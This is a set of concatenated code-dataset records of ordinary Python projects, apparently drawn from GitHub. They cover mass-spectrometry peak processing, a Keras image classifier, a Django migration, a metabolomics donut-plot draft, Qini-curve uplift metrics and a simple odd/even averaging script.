warnings.warn(\"No scan events remaining after filtering. Remove MS data file or alter parameters.\")\n\n return groups\n\n\ndef process_scans(filename: str, groups: list, function_noise: str, snr_thres: float, ppm: float,\n min_fraction: float = None, rsd_thres: float = None, normalise: bool = False,\n ringing_thres: float = None, exclusion_list: dict = {}, report: str = None,\n block_size: int = 5000, ncpus: int = None):\n\n \"\"\"\n\n :param filename:\n :param groups:\n :param function_noise:\n :param snr_thres:\n :param ppm:\n :param min_fraction:\n :param rsd_thres:\n :param normalise:\n :param ringing_thres:\n :param exclusion_list:\n :param report:\n :param block_size: number of peaks in each clustering block.\n :param ncpus: number of CPUs for parallel clustering. 
Default = None, indicating using as many as possible\n :return: List of (average) PeakList objects (DIMSpy)\n :rtype: Sequence[PeakList]\n \"\"\"\n\n print()\n print(os.path.basename(filename))\n\n if filename.lower().endswith(\".mzml\"):\n run = mzml_portal.Mzml(filename)\n elif filename.lower().endswith(\".raw\"):\n run = thermo_raw_portal.ThermoRaw(filename)\n else:\n raise IOError(\"Incorrect file format: {}\".format(os.path.basename(filename)))\n\n mz_ranges = []\n if exclusion_list is not None and len(exclusion_list) > 0:\n mz_ranges = [mz_tolerance(mz, ppm) for mz in exclusion_list]\n\n if normalise:\n rsd_on_attr = \"intensity_norm\"\n rsd_label = \"rsd_intensity_norm\"\n else:\n rsd_on_attr = \"intensity\"\n rsd_label = \"rsd\"\n\n if report is not None:\n out = open(report, \"w\")\n out.write(\"tree_id\\tevent\\tscans\\tpeaks\\tmedian_{}\\n\".format(rsd_label))\n\n # Check for MS1 scans with the same scan_ids (grouped) to avoid redundant processing\n ms1_headers, temp_scan_ids = collections.OrderedDict(), []\n for G in groups:\n n = list(G.nodes(data=True))[0]\n if temp_scan_ids.count(n[1][\"scanids\"]) > 1 and n[0] not in ms1_headers:\n ms1_headers[n[0]] = None\n temp_scan_ids.append(n[1][\"scanids\"])\n\n pls_avg = []\n\n for G in groups:\n nodes = G.nodes(data=True)\n print(\"Processing scans....\")\n print(\"\\n\".join(map(str, [n[0] for n in nodes])))\n print()\n for n in nodes:\n pls_scans = [run.peaklist(scan_id, function_noise=function_noise) for scan_id in n[1][\"scanids\"]]\n # Check for MS1 scan available with the same scan_ids (grouped) to avoid redundant processing\n if n[0] in ms1_headers and ms1_headers[n[0]] is not None:\n copy_ms1 = ms1_headers[n[0]].copy()\n # update id\n copy_ms1.ID = \"{}#{}:{}\".format(os.path.basename(filename), G.graph['id'], n[0])\n pls_avg.append(copy_ms1)\n nscans, n_peaks, median_rsd = len(pls_scans), copy_ms1.shape[0], np.nanmedian(copy_ms1.get_attribute(rsd_label))\n else:\n if ringing_thres is not None and float(ringing_thres) > 0.0:\n #print \"Removing ringing artifacts.....\"\n pls_scans = [filter_ringing(pl, threshold=ringing_thres, bin_size=1.0) if len(pl.mz) > 0 else pl for pl in pls_scans]\n\n pls_scans = [filter_attr(pl, \"snr\", min_threshold=snr_thres) if len(pl.mz) > 0 else pl for pl in pls_scans]\n\n if normalise:\n # print \"Normalise by Total Ion Current (TIC).....\"\n pls_scans = [pl.add_attribute(\"intensity_norm\", pl.get_attribute(\"intensity\", False) / pl.metadata[\"tic\"], flagged_only=False, on_index=2) if len(pl.mz) > 0 else pl for pl in pls_scans]\n\n #print \"Aligning, averaging and filtering peaks.....\"\n nscans, n_peaks, median_rsd = len(pls_scans), 0, \"NA\"\n\n if sum(pl.shape[0] for pl in pls_scans) == 0:\n warnings.warn(\"No scan data available for {}\".format(n[0]))\n else:\n if len(pls_scans) == 1:\n pl_avg = average_replicate_scans(\"{}#{}:{}\".format(os.path.basename(filename), G.graph['id'], n[0]), pls_scans, ppm, min_fraction, None, rsd_on_attr, block_size, ncpus)\n if rsd_on_attr != \"intensity\":\n pl_avg.add_attribute(\"rsd_{}_flag\".format(rsd_on_attr), np.ones(pl_avg.full_size), flagged_only=False, is_flag=True)\n else:\n pl_avg.add_attribute(\"rsd_flag\", np.ones(pl_avg.full_size), flagged_only=False, is_flag=True)\n else:\n pl_avg = average_replicate_scans(\"{}#{}:{}\".format(os.path.basename(filename), G.graph['id'], n[0]), pls_scans, ppm, min_fraction, rsd_thres, rsd_on_attr, block_size, ncpus)\n\n if exclusion_list is not None and len(exclusion_list) > 0:\n pl_avg = 
filter_mz_ranges(pl_avg, mz_ranges, flag_name=\"exclusion_flag\", flagged_only=False)\n\n # add to full_scans to avoid redundant processing\n if n[0] in ms1_headers and ms1_headers[n[0]] is None:\n ms1_headers[n[0]] = pl_avg.copy()\n\n pls_avg.append(pl_avg)\n n_peaks, median_rsd = pl_avg.shape[0], np.nanmedian(pl_avg.get_attribute(rsd_label))\n\n if report is not None:\n out.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(groups.index(G) + 1, n[0], nscans, n_peaks, median_rsd))\n\n if len(pls_avg) == 0:\n raise IOError(\"No peaks remaining after filtering. Remove file from Study (filelist).\")\n\n if report is not None:\n out.close()\n\n return pls_avg\n\n\ndef create_spectral_trees(trees: Sequence[nx.OrderedDiGraph], peaklists: Sequence[PeakList]):\n\n \"\"\"\n\n :param trees: list of NetworkX graphs\n :param peaklists: list of PeakList objects\n :return:\n :rtype: Sequence[nx.OrderedDiGraph]\n \"\"\"\n\n spectral_trees = []\n\n headers = [pl.ID.split(\"#\")[1] for pl in peaklists]\n\n for i, G in enumerate(trees):\n GG = nx.OrderedDiGraph()\n GG.graph[\"id\"] = G.graph[\"id\"]\n for edge in list(G.edges(data=True)):\n\n header_prec = \"{}:{}\".format(G.graph[\"id\"], edge[0])\n if len(G.node[edge[0]][\"scanids\"]) == 0 or header_prec not in headers:\n if \" ms \" in header_prec:\n warnings.warn(\"Cannot create a spectral tree without precursor from {}\".format(header_prec))\n break\n continue\n\n pl = peaklists[headers.index(header_prec)]\n mz_prec, intensity_prec = assign_precursor(pl, edge[1], tolerance=0.5)\n\n if not mz_prec:\n if \" ms \" in header_prec:\n warnings.warn(\"Cannot create a spectral tree without precursor from {}\".format(header_prec))\n break\n continue\n else:\n mz_id_prec = \"{}_{}_{}\".format(round(mz_prec, 4), headers.index(header_prec), np.where(pl.mz == mz_prec)[0][0])\n GG.add_node(mz_id_prec, mz=mz_prec, intensity=intensity_prec, header=header_prec.split(\":\")[1], mslevel=G.node[edge[0]][\"mslevel\"], precursor=True)\n\n header_frag = \"{}:{}\".format(G.graph[\"id\"], edge[1])\n if len(G.node[edge[1]][\"scanids\"]) == 0 or header_frag not in headers:\n continue\n\n pl_fragments = peaklists[headers.index(\"{}:{}\".format(G.graph[\"id\"], edge[1]))]\n for j, mz_frag in enumerate(pl_fragments.mz):\n mz_id_frag = \"{}_{}_{}\".format(round(mz_frag, 4), headers.index(header_frag), j)\n GG.add_node(mz_id_frag, mz=mz_frag, intensity=pl_fragments.intensity[j], header=header_frag.split(\":\")[1], mslevel=G.node[edge[1]][\"mslevel\"], precursor=False)\n GG.add_edge(mz_id_prec, mz_id_frag, mzdiff=round(mz_prec - mz_frag, 7), type=\"e\")\n\n for node in nx.isolates(GG):\n GG.remove_node(node)\n\n spectral_trees.append(GG)\n return spectral_trees\n","repo_name":"computational-metabolomics/msnpy","sub_path":"msnpy/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":19784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21957543330","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nimport os\nimport matplotlib.pyplot as plt\ndef read_data():\n for file_name in os.listdir('./images/images'):\n print(file_name)\n\n image_size = (180, 180)\n batch_size = 64\n train_ds, val_ds = tf.keras.utils.image_dataset_from_directory(\n \"./images/images\",\n 
validation_split=0.2,\n subset=\"both\",\n seed=42,\n image_size=image_size,\n batch_size=batch_size,\n labels='inferred',\n label_mode = 'int'\n )\n\n # plt.figure(figsize=(10, 10))\n # for images, labels in train_ds.take(1):\n # for i in range(9):\n # ax = plt.subplot(3, 3, i + 1)\n # plt.imshow(images[i].numpy().astype(\"uint8\"))\n # plt.title(int(labels[i]))\n # plt.axis(\"off\")\n return train_ds, val_ds\n\n\ndef data_processing(ds):\n data_augmentation = keras.Sequential(\n [\n layers.RandomFlip(\"horizontal\"),\n layers.RandomRotation(0.3),\n ]\n )\n\n ds = ds.map(\n lambda img, label: (data_augmentation(img), label),\n num_parallel_calls=tf.data.AUTOTUNE,\n )\n ds = ds.prefetch(tf.data.AUTOTUNE)\n return ds\ndef build_model(input_shape, num_classes):\n inputs = keras.Input(shape=input_shape)\n\n # Entry block\n x = layers.Rescaling(scale=1./127.5, offset=-1)(inputs)\n x = layers.Conv2D(128, 3, strides=2, padding=\"same\")(x)\n x = layers.BatchNormalization()(x)\n x = layers.Activation(\"relu\")(x)\n\n previous_block_activation = x # Set aside residual\n\n for size in [256, 512, 768]:\n x = layers.Activation(\"relu\")(x)\n x = layers.SeparableConv2D(size, 3, padding=\"same\")(x)\n x = layers.BatchNormalization()(x)\n\n x = layers.Activation(\"relu\")(x)\n x = layers.SeparableConv2D(size, 3, padding=\"same\")(x)\n x = layers.BatchNormalization()(x)\n\n x = layers.MaxPooling2D(3, strides=2, padding=\"same\")(x)\n\n # Project residual\n residual = layers.Conv2D(size, 1, strides=2, padding=\"same\")(\n previous_block_activation\n )\n x = layers.add([x, residual]) # Add back residual\n previous_block_activation = x # Set aside next residual\n\n x = layers.SeparableConv2D(1024, 3, padding=\"same\")(x)\n x = layers.BatchNormalization()(x)\n x = layers.Activation(\"relu\")(x)\n\n x = layers.GlobalAveragePooling2D()(x)\n if num_classes == 2:\n activation = \"sigmoid\"\n units = 1\n else:\n activation = \"softmax\"\n units = num_classes\n\n x = layers.Dropout(0.5)(x)\n outputs = layers.Dense(units, activation=activation)(x)\n model = keras.Model(inputs, outputs)\n\n # keras.utils.plot_model(model, show_shapes=True)\n return model\n\ndef train_model(model, train_ds, val_ds):\n epochs = 100\n\n callbacks = [\n keras.callbacks.ModelCheckpoint(\"save_at_{epoch}.keras\"),\n ]\n model.compile(\n optimizer=keras.optimizers.Adam(1e-3),\n loss='SparseCategoricalCrossentropy',\n metrics=[\"accuracy\"],\n )\n model.fit(\n train_ds,\n epochs=epochs,\n callbacks=callbacks,\n validation_data=val_ds,\n )\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n train_ds, val_ds = read_data()\n train_ds = data_processing(train_ds)\n # val_ds = val_ds\n model = build_model((180, 180)+(3,), 5)\n train_model(model, train_ds, val_ds)\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"peiningzhang/CS4341_2023Fall","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23429252910","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport ckeditor.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0008_siteconfiguration'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='siteconfiguration',\n name='homepage_content',\n field=ckeditor.fields.RichTextField(help_text=\"Contenu de la page d'accueil\", 
verbose_name=\"Page d'accueil\"),\n ),\n migrations.AlterField(\n model_name='siteconfiguration',\n name='news_count',\n field=models.IntegerField(help_text='Nombre de news dans la liste des news', verbose_name='Actualités', default=9),\n ),\n migrations.AlterField(\n model_name='siteconfiguration',\n name='site_title',\n field=models.CharField(help_text=\"Titre du site (dans l'onglet du navigateur)\", max_length=255, verbose_name='Titre du site', default='Site title'),\n ),\n ]\n","repo_name":"agripo/website","sub_path":"core/migrations/0009_auto_20150821_1910.py","file_name":"0009_auto_20150821_1910.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19227836060","text":"#to find average of odd and even numbers seperately\n\nn=int(input(\"enter number of numbers\"))\nlist=[]\neven=[]\nodd=[]\n\nfor i in range (n):\n num = int(input(\"enter a number\"))\n list.append(num)\n\n if num%2==0:\n even.append(num)\n else:\n odd.append(num)\n\nprint(list)\nprint(even)\nprint(odd)\n\nsumeven=0\nsumodd=0\nfor i in range(len(even)):\n sumeven=sumeven + even[i]\n\nfor i in range(len(odd)):\n sumodd=sumodd + odd[i]\n\navgeven=sumeven/len(even) \navgodd=sumodd/len(odd)\n\nprint(\"average of entered even numbers is\",avgeven)\nprint(\"average of entered odd numbers is\",avgodd)\n","repo_name":"anishmanchanda/average-of-odd-and-even-seperately-in-sublist","sub_path":"average odd even seperately list.py","file_name":"average odd even seperately list.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26556663050","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\nfrom matplotlib.colors import Normalize\nfrom matplotlib.colors import LinearSegmentedColormap\nimport matplotlib as mpolib\n\n\n\n# from txt files make pathways dico (admits mixed genes and metabolites by pathway),\n# same gene/met can be shared by two or more pathways, this is ok\npathways_files = ['pathway1.txt', 'pathTWO.txt']\npathdico = dict()\nfor fi in pathways_files:\n tmp = pd.read_csv(fi, header=None)\n path_name = fi.replace(\".txt\", \"\")\n pathdico[path_name] = tmp[0].to_list()\n\nprint(pathdico) # {'pathway1': ['GENE1', 'GENE2', ... 
'metabo1', 'metabo2' ...], ...}\n\ndimensions_pdf = (14,10)\n# comparisons in yaml file : provide each comparison 'title', followed by [DEG table , DAM table ]\ncomparisondico = {'fake1' : ['genesfake.tsv' ,'metabosfake.tsv'],\n 'rigolo' : ['genesrigolo.tsv' ,'metabosrigolo.tsv'],}\n\n\nDEG_full = pd.DataFrame({'name': [], 'log2FC': []})\nDAM_full = pd.DataFrame({'name': [], 'log2FC': []})\n\nprint('\\nVerifying input data for metabologram')\nfor comparison in comparisondico.keys():\n print(\"\")\n DEGtable = comparisondico[comparison][0]\n DAMtable = comparisondico[comparison][1]\n print('comparison : ', comparison)\n print('DEG table :', DEGtable)\n print('DAM table :', DAMtable)\n genesdf = pd.read_csv(DEGtable, sep='\\t')\n metsdf = pd.read_csv(DAMtable, sep='\\t')\n metsdf = metsdf[['mets', 'log2FC']]\n metsdf.columns = ['name', 'log2FC']\n genesdf.columns = ['name', 'log2FC']\n metsdf = metsdf.assign(comparison = comparison, typemol = \"metabolite\")\n genesdf = genesdf.assign(comparison = comparison, typemol = \"gene\")\n DEG_full = pd.concat([DEG_full, genesdf], axis = 0)\n DAM_full = pd.concat([DAM_full, metsdf], axis = 0)\n\nprint(DEG_full)\nprint(DAM_full)\n\n\n###################################################### color functions\n\n\ndef get_custom_color_palette_hash(lowcol, midcol, highcol):\n \"\"\"\n courtesy from :\n https://richardhildebrand.wordpress.com/2019/09/18/create-a-custom-color-palette-with-matplotlib-and-seaborn/\n \"\"\"\n colorlist = [lowcol, midcol, highcol]\n return LinearSegmentedColormap.from_list(\"\", colorlist, N=256)\n\nmycmap = get_custom_color_palette_hash('#0070C0', 'white', '#D30000')\n\n# max absolute value both genes and metabo\nmabs = max(abs(DAM_full['log2FC']))\ngabs = max(abs(DEG_full['log2FC']))\n\n\ndef rgbas2hex(rgbas_):\n colorsout = []\n for tup in rgbas_:\n tmp = mpolib.colors.to_hex(tup)\n colorsout.append(tmp)\n return colorsout\n\n\n\ndef values2rgbas(myvalues, mycmap, vmin, vmax, center):\n if center == 0:\n # Normalize data before giving colors, because map interval is [0,1] by matplotlib\n # https://stackoverflow.com/questions/25408393/getting-individual-colors-from-a-color-map-in-matplotlib\n norm = Normalize(vmin=vmin, vmax=vmax)\n rgba_tuples = mycmap(norm(myvalues))\n return rgba_tuples\n else :\n print(\"only center == 0 is handled here\")\n\n\ndef inner_pie_colors(inner_dico, mycmap, gabs, mabs):\n metaboval = inner_dico['metabo_sum_val']\n geneval = inner_dico['gene_sum_val']\n metabocolors_ = rgbas2hex(values2rgbas([metaboval], mycmap, -mabs, mabs, center=0))\n genecolors_ = rgbas2hex(values2rgbas([geneval], mycmap, -gabs, gabs, center=0))\n return {'metab_color' : metabocolors_[0], 'gene_color': genecolors_[0]}\n\n\nDEG_full['mycolors'] = rgbas2hex(values2rgbas(DEG_full['log2FC'].to_numpy(), mycmap, -gabs, gabs, center=0))\nDAM_full['mycolors'] = rgbas2hex(values2rgbas(DAM_full['log2FC'].to_numpy(), mycmap, -mabs, mabs, center=0))\n\n\nDAM_full['much'] = 50/(DAM_full.shape[0])\nDEG_full['much'] = 50/(DEG_full.shape[0])\ngathered = pd.concat([DAM_full,DEG_full], axis = 0)\n\ngathered['typemol'] = pd.Categorical(gathered['typemol'], categories = ['metabolite', 'gene'])\ngathered = gathered.sort_values(by='typemol')\n\nlog2FCstrli = [str(i) for i in gathered[\"log2FC\"]]\ngathered[\"blah\"] = gathered[\"name\"].str.cat(log2FCstrli, sep = \": \")\n\n\nprint(\"preparation ok\")\n# also see :https://proplot.readthedocs.io/en/latest/why.html\n\n\n###################################### complicated grid\n# PLOT GRID :\n# as many 
columns as comparisons,\n# as many rows as paths + add supplementary row(s) for bars\nnbpaths = len(pathdico)\n\nnbcompars = len(comparisondico) # this has to be deduced from tables files\n\ntf = True\n\nif nbcompars == 1:\n    supplerows = 2\nelse:\n    supplerows = 1\n\n\nif dimensions_pdf is None:\n    dimensions_pdf = (nbpaths*7, supplerows*9)  # fixed: tuple(a, b) raises TypeError; a tuple literal is intended\nsns.set_style({'font.family' : 'serif', 'font.serif':['Meiryo']})\nfig, axes = plt.subplots(nrows = nbpaths + supplerows,\n                         ncols = nbcompars, figsize=dimensions_pdf)\nfig.subplots_adjust(bottom=0, top=0.9, left=0, right=1,\n                    wspace=0.2, hspace=0.4)\n# prepare subsetters as indexesdico for axes.flat usage\nindexesdico = dict()\nindexer = 0\nfor i in pathdico.keys():\n    for j in comparisondico.keys():\n        indexesdico[indexer] = {'path': i, 'comparison': j}\n        indexer += 1\nindexer = 0\nfor ax in axes.flat[:len(indexesdico)]:\n    print(indexer)\n    ax = axes.flat[indexer]\n    path_elems_here = pathdico[ indexesdico[indexer]['path'] ]\n    gatheredsub = gathered.loc[gathered['name'].isin(path_elems_here),: ]\n    compari_here = indexesdico[indexer]['comparison']\n    ax.set_title(f\"{indexesdico[indexer]['path'] }\\n {compari_here}\\n\")\n    gatheredsub = gatheredsub.loc[gatheredsub['comparison'] == compari_here,: ]\n    print(gatheredsub)\n\n    ##################\n    # donut\n    ##################\n    log2FC = gatheredsub[\"log2FC\"]\n    sizefoo = gatheredsub[\"much\"]\n    annots = gatheredsub[\"blah\"]\n    mappedcolorshaha = gatheredsub[\"mycolors\"]\n\n    if tf == False:\n        ax.pie(sizefoo,\n               colors=mappedcolorshaha,\n               wedgeprops={'width': 1, 'edgecolor': 'black', 'linewidth': 0.8},\n               radius=1,\n               startangle=90)\n    else: # add metabolites to the plot\n        ax.pie(sizefoo,\n               colors=mappedcolorshaha,\n               wedgeprops={'width': 1, 'edgecolor': 'black', 'linewidth': 0.8},\n               radius=1,\n               startangle=90,\n\n               labels=annots, ## this one yields the labels annotated in the plot\n               textprops={'fontsize': 12}\n               )\n    ## white circles for artist patches\n    my_circle2 = plt.Circle((0, 0), radius=0.47, edgecolor=\"black\", linewidth=1.6)\n    my_circle = plt.Circle((0, 0), radius=0.465, color=\"white\")\n    ax.add_patch(my_circle2)\n    ax.add_patch(my_circle)\n    inner_dico = { 'metabo_sum_val' : gatheredsub.loc[gatheredsub.typemol == 'metabolite', 'log2FC'].sum(),\n                   'gene_sum_val' : gatheredsub.loc[gatheredsub.typemol == 'gene', 'log2FC'].sum() }\n    inner_colorsD = inner_pie_colors(inner_dico, mycmap, gabs, mabs)\n    innerlabelsorder = [ inner_colorsD['metab_color'], inner_colorsD['gene_color'] ]\n    print(inner_dico)\n    # internal pie\n    ax.pie([50, 50],\n           colors=[ inner_colorsD['metab_color'], inner_colorsD['gene_color'] ],\n           wedgeprops={'width': 0.41, 'edgecolor': 'black', 'linewidth': 0.7},\n           radius=0.41,\n           startangle=90,\n           labels = np.array([inner_dico['metabo_sum_val'], inner_dico['gene_sum_val']]).round(1),\n           labeldistance = 0.2)\n    ax.axis('equal')\n    ax.legend('', frameon=False) # https://www.statology.org/remove-legend-matplotlib/\n    # ax.tight_layout()\n    # ####\n    # end donut\n    ###\n    indexer += 1\n# end for\n\n# fill last two panels with color bar key\n\n\n# do \"fake\" separated heatmaps to take the colorbar key separately for metabolites and for genes\nsns.heatmap([[]], ax=axes.flat[-2], cmap=mycmap, center=0, cbar=True,\n            annot=False,\n            square=True,\n            vmin=-mabs, vmax=mabs, cbar_kws={'shrink': 0.9, 'aspect': 10,\n                                             'label': 'metabolite',\n                                             'drawedges': False})\n# axes.flat[-2].text(-0.3, 0.7, \"metabolite\", rotation=90)\n\nsns.heatmap([[]], ax=axes.flat[-1], cmap=mycmap, center=0, cbar=True,\n            annot=False,\n            square=True,\n            
vmin=-gabs, vmax=gabs, cbar_kws={'shrink': 0.9, 'aspect': 10,\n 'label': 'gene',\n 'drawedges': False})\n# axes.flat[-1].text(-0.3, 0.7, \"gene\", rotation=90)\n\nplt.savefig(\"MYDONUTS.pdf\")\n\n# thanks also to:\n#https://stackoverflow.com/questions/49199164/increasing-pie-chart-size-with-matplotlib-radius-parameter-appears-to-do-nothin\n","repo_name":"johaGL/rough_code","sub_path":"recyclebin_dimet/drafts_dimet/draft_metabologram.py","file_name":"draft_metabologram.py","file_ext":"py","file_size_in_byte":8663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21706636268","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.stats import rankdata, kendalltau\n\n\ndef qini_curve(treat, outcome, uplift_prob_, p_precision=2, plotit=True, name=\"\"):\n \"\"\"\n Returns a qini curve table using final predicted uplifts from the model\n and the associated qini coefficient\n\n Parameters:\n :param treat - Traetment group for each sample (Whether the sample is in Test/Conrol group)\n :param outcome - Outcome for the given sample (Sale happened or not)\n :param uplift_prob_ - Predicted uplift probabilities by the model for sorting the customers/samples\n :param p_precision - Precision for ranking quantiles (if 1 it rounds the quantiles to the first decimal and\n generates Qini for deciles, if 2 it rounds the quantiles to the second decimal and\n generates Qini for percentiles, and so on...)\n :param plotit - Plot the Qini curve\n \"\"\"\n\n # Create a dataframe for the input variables\n outcome = np.array(outcome).reshape(-1,1)\n treat = np.array(treat).reshape(-1,1)\n uplift_prob_ = np.array(uplift_prob_).reshape(-1,1)\n d = np.concatenate((outcome, treat, uplift_prob_), axis=1)\n df = pd.DataFrame(d, columns=['outcome', 'treat', 'pred_uplift'])\n df = df.sort_values(by='pred_uplift', ascending=False).reset_index(drop=True)\n\n # Sorting and ranking the samples/customers using the predicted uplifts\n df['rank'] = np.round(rankdata(-df['pred_uplift'], method='max') / df.values.shape[0], p_precision)\n\n # Building cummulative sales and actual uplifts for input data for each of the groups\n no_of_groups = np.unique(df['rank'])\n no_of_groups = no_of_groups[no_of_groups > 0]\n qini_table = np.zeros((len(no_of_groups), 7))\n for i in range(len(no_of_groups)):\n subset = df.loc[df['rank'] <= no_of_groups[i]]\n qini_table[i, 0] = no_of_groups[i]\n qini_table[i, 1] = subset.loc[subset['treat'] == 1].loc[subset['outcome'] == 1].shape[0] # sales_in_Test\n qini_table[i, 2] = subset.loc[subset['treat'] == 1].shape[0]\n qini_table[i, 3] = subset.loc[subset['treat'] == 0].loc[subset['outcome'] == 1].shape[0] # sales_in_control\n qini_table[i, 4] = subset.loc[subset['treat'] == 0].shape[0]\n\n # Actual Uplift using the Normalized sales values for control & test groups\n qini_table[i, 5] = qini_table[i, 1] - qini_table[i, 3] * qini_table[i, 2] / qini_table[i, 4]\n\n # Cummulative acutal uplifts calculated\n qini_table[:, 6] = qini_table[:, 5] / qini_table[len(no_of_groups) - 1, 2] * 100\n\n # Uplift values from the model for plotting Qini\n x_axis = np.concatenate((np.zeros(1), qini_table[:, 0]))\n y_axis = np.concatenate((np.zeros(1), qini_table[:, 6]))\n\n # Uplift values by random targeting\n x_rand = np.array((0, 1))\n y_rand = np.array((0, qini_table[len(no_of_groups) - 1, 6]))\n\n # Build dataframe for the Decile table\n qini_table_to_return = pd.DataFrame(qini_table)\n qini_table_to_return.columns = 
['%_of_list', 'Sales_in_Test', 'Obs_in_Test', 'Sales_in_Control', 'Obs_in_Control',\n                                   'Norm_Cum_Uplift', 'Cum_Uplift(%)']\n\n    # Compute the Qini coefficient\n    nb = len(qini_table_to_return)\n    qini_coeff = qini_table_to_return.values[0, 6] / 2 * qini_table_to_return.values[0, 2] / \\\n                 qini_table_to_return.values[nb - 1, 2]\n    for i in range(1, nb):\n        qini_coeff += (qini_table_to_return.values[i, 6] + qini_table_to_return.values[i - 1, 6]) / 2 * (\n                qini_table_to_return.values[i, 2] / qini_table_to_return.values[nb - 1, 2] -\n                qini_table_to_return.values[i - 1, 2] / qini_table_to_return.values[nb - 1, 2])\n\n    qini_coeff -= qini_table_to_return.values[nb - 1, 6] / 2\n\n    if plotit:\n        # plot the qini curve\n        plt.title('Qini Curve')\n        plt.xlabel('Proportion of Treated Observations')\n        plt.ylabel('Incremental Positive Outcomes (%)')\n        plt.plot(x_axis, y_axis, '--r', label='Uplift Model')\n        plt.plot(x_rand, y_rand, '--b', label='Random')\n        plt.legend(loc='lower center', bbox_to_anchor=(1.4, 0.0), shadow=True, ncol=1)\n        if name != \"\":\n            plt.savefig(name)\n        plt.show(block=True)\n\n    return qini_table_to_return, qini_coeff\n\n\ndef qini_barplot(treat, outcome, uplift_prob_, p_precision=1, plotit=True):\n    \"\"\"\n    Returns a barplot table using final predicted uplifts from the model\n    and the associated uplift kendall's correlation\n\n    Parameters:\n    :param treat - Treatment group for each sample (Whether the sample is in Test/Control group)\n    :param outcome - Outcome for the given sample (Sale happened or not)\n    :param uplift_prob_ - Predicted uplift probabilities by the model for sorting the customers/samples\n    :param p_precision - Precision for ranking quantiles (if 1 it rounds the quantiles to the first decimal and\n                         generates barplot for deciles, if 2 it rounds the quantiles to the second decimal and\n                         generates barplot for percentiles, and so on...)\n    \"\"\"\n\n    # Create a dataframe for the input variables\n    outcome = np.array(outcome).reshape(-1, 1)\n    treat = np.array(treat).reshape(-1, 1)\n    uplift_prob_ = np.array(uplift_prob_).reshape(-1, 1)\n    d = np.concatenate((outcome, treat, uplift_prob_), axis=1)\n    df = pd.DataFrame(d, columns=['outcome', 'treat', 'pred_uplift'])\n    df = df.sort_values(by='pred_uplift', ascending=False).reset_index(drop=True)\n\n    # Sorting and ranking the samples/customers using the predicted uplifts\n    df['rank'] = np.round(rankdata(-df['pred_uplift'], method='max') / df.values.shape[0], p_precision)\n\n    # Build BarPlot\n    no_of_groups = np.unique(df['rank'])\n    no_of_groups = no_of_groups[no_of_groups > 0]\n    table = np.zeros((len(no_of_groups), 12))\n    for i in range(len(no_of_groups)):\n        if i == 0:\n            subset = df.loc[df['rank'] <= no_of_groups[i]]\n        else:\n            subset = df.loc[(no_of_groups[i - 1] < df['rank']) & (df['rank'] <= no_of_groups[i])]\n        table[i, 0] = no_of_groups[i] * 100\n        table[i, 1] = subset.loc[subset['treat'] == 1].loc[subset['outcome'] == 1].shape[0]\n        table[i, 2] = subset.loc[subset['treat'] == 1].shape[0]\n        table[i, 3] = subset.loc[subset['treat'] == 0].loc[subset['outcome'] == 1].shape[0]\n        table[i, 4] = subset.loc[subset['treat'] == 0].shape[0]\n        table[i, 5] = \"{0:.4f}\".format(subset['pred_uplift'].mean())\n        table[i, 6] = table[i, 1] / table[i, 2] * 100\n        table[i, 7] = table[i, 3] / table[i, 4] * 100\n        table[i, 8] = table[i, 6] - table[i, 7]\n        table[i, 9] = \"{0:.4f}\".format(subset['pred_uplift'].min())  # min uplift in that particular bin\n        table[i, 10] = \"{0:.4f}\".format(subset['pred_uplift'].max())  # max uplift in that particular bin\n        table[i, 11] = 
(table[i, 1] + table[i, 3]) * 100 / df.outcome.sum() # %sales captured in that bin\n\n # Build dataframe for the Decile table\n table_to_return = pd.DataFrame(table)\n table_to_return.columns = ['%_of_list', 'Sales_in_Test', 'Obs_in_Test', 'Sales_in_Control', 'Obs_in_Control',\n 'avg_pred_uplift', 'sale%_in_Test', 'sale%_in_Control', 'observed_uplift(%)',\n 'min_pred_uplift', 'max_pred_uplift', '%sales_captured']\n\n # Compute Kendall's rank correlation\n observed_uplift_rank = rankdata(-table_to_return['observed_uplift(%)'], method='average')\n predicted_uplift_rank = np.array(range(1, len(table_to_return) + 1))\n uplift_kendalltau = np.round(kendalltau(observed_uplift_rank, predicted_uplift_rank)[0], 2)\n uplift_risk = np.mean((observed_uplift_rank - predicted_uplift_rank)**2)\n\n if plotit:\n # Create bars\n plt.bar(np.arange(len(table_to_return)), table_to_return['observed_uplift(%)'])\n # Create names on the x-axis\n plt.xticks(np.arange(len(table_to_return)), table_to_return['%_of_list'])\n plt.title('Uplift Barplot')\n plt.xlabel('Proportion or Targeted Individuals')\n plt.ylabel('Policy Sales (%)')\n # Show graphic\n plt.show(block=True)\n\n return uplift_risk, uplift_kendalltau\n","repo_name":"belbahrim/twin-causal-net","sub_path":"src/twincausal/utils/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":8236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31358412671","text":"'''\nFile housing the Asteroid class, a subclass of AMUSE Particle with added functionality.\nCalculates its own YORP and Yarkovsky forces in 